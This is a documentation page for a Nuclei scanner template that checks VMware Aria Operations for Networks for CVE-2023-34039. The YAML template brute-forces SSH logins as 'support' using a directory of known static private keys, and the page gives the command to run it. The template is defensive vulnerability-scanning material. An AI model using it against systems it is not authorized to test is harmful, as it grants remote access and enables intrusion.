Skip to content
Nuclei Templates

VMWare Aria Operations - Remote Code Execution

ID: CVE-2023-34039

Severity: critical

Author: tarunKoyalwar

Tags: js,packetstorm,cve,vmware,aria,rce,fuzz,vrealize,cve2023

Description

Section titled “Description”

VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)Version: All versions from 6.0 to 6.10

YAML Source

Section titled “YAML Source”
id: CVE-2023-34039


info:
  name: VMWare Aria Operations - Remote Code Execution
  author: tarunKoyalwar
  severity: critical
  description: |
    VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
    Version: All versions from 6.0 to 6.10
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution or a complete system crash.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
  reference:
    - https://github.com/sinsinology/CVE-2023-34039.git
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34039
    - http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html
    - https://www.vmware.com/security/advisories/VMSA-2023-0018.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34039
    cwe-id: CWE-327
    epss-score: 0.9013
    epss-percentile: 0.98721
    cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: vmware
    product: aria_operations_for_networks
  tags: js,packetstorm,cve,vmware,aria,rce,fuzz,vrealize,cve2023
variables:
  keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory


javascript:
  # init field can be used to make any preperations before the actual exploit
  # here we are reading all private keys from helpers folder and storing them in a list
  - init: |
      let m = require('nuclei/fs');
      let privatekeys = m.ReadFilesFromDir(keysDir)
      updatePayload('keys',privatekeys)
    # check if port is open before bruteforcing
    pre-condition: |
      isPortOpen(Host,Port)
    # actual exploit
    code: |
      let m = require('nuclei/ssh')
      let c = m.SSHClient()
      c.ConnectWithKey(Host,Port,'support@'+Host,key) // returns true if connection is successful
    args:
      Host: "{{Host}}"
      Port: "22"
      key: "{{keys}}"
      keysDir: "{{keysDir}}"
    payloads:
      # 'keys' will be updated by actual private keys after init is executed
      keys:
        - dummy1
        - dummy2
    threads: 10
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - success && response
# digest: 4a0a0047304502202e5f8d9dc7673eacccc4e162a630616175f0c72e59e7cae968373d0bd2dc84630221009ae05dc4813f5ba6ccb9c109f607ce73b32b2abc00ed3501120bb3de53f6f91a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "javascript/cves/2023/CVE-2023-34039.yaml"

View on Github